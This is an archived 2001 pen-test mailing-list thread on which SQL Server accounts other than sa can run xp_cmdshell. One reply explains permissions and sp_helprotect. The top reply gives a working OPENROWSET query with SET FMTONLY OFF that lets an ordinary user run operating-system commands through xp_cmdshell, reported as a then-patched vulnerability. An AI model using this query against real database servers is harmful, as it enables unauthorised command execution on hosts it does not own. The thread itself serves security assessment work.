RE: besides "sa" who can run xp_cmdshell

["Lopes, Leonardo (ISSBrazil)" <llopes () iss net>]

You cant try this query. With this you are enable to run xp_cmdshell with
other common user.
This is a vunerability of SQL Server and MICRO$OFT have released one patch
for this.

SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data
Source=MY_SERVER','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')

Inté!

-----Original Message-----
From: INA (V. Brahmanandam) [mailto:BrahmanandamV () emiratesbank com]
Sent: Thursday, August 09, 2001 2:23 AM
To: 'nemo latin'
Cc: 'pen-test () securityfocus com'
Subject: RE: besides "sa" who can run xp_cmdshell


Hi,

By default, only members of the sysadmin fixed server role can execute this
extended stored procedure. However, permissions can be granted to other
users to execute stored procedures and extended stored procedures.

You can find out the current permissions by running 'sp_helprotect' stored
procedure, which will tell, who else, apart from members in sysadmin fixed
server role, has execute permission on this.

Regards.

Brahma



-----Original Message-----
From:   nemo latin [mailto:nemo_old () yahoo com]
Sent:   Monday, August 06, 2001 11:33 PM
To:     pen-test () securityfocus com
Subject:        besides "sa" who can run xp_cmdshell

In our shop we have several SQL 6.5 servers with the
probe account open (null password).

I have listed and tried all the stored procedures that
it can run.  None of them are really a security
exposure.

However, I have also discovered that the DBA's have
assigned many user accounts with a null passwword.
This leads to the question ..

Is there a way to determine which accounts (other than
SA) can run the xp_cmdshell  ?  I think that the
ability to run this stored procedure can be assigned
to userids other than SA.

Is there a way to find them ??  Other than logging on
with each userid (that has a NULL pswd - about 30 of
them - a bad practice) and trying the xp_cmdshell.

The other holes - such as SQL injection are all
plugged (we seem to have pretty good asp coders) no
other user defined sp's seems to be vulnerable.  The
databases tables/views are being tightened up so I am
focusing on the SQL/OS interface.

I believe that the ability to run the xp_cmdshell has
been given to other accounts - and I think that I may
have to try each account !!!

Any short cuts to find out who can run this sp ??
:)

nemo_old

__________________________________________________
Do You Yahoo!?
Make international calls for as low as $.04/minute with Yahoo! Messenger
http://phonecard.yahoo.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/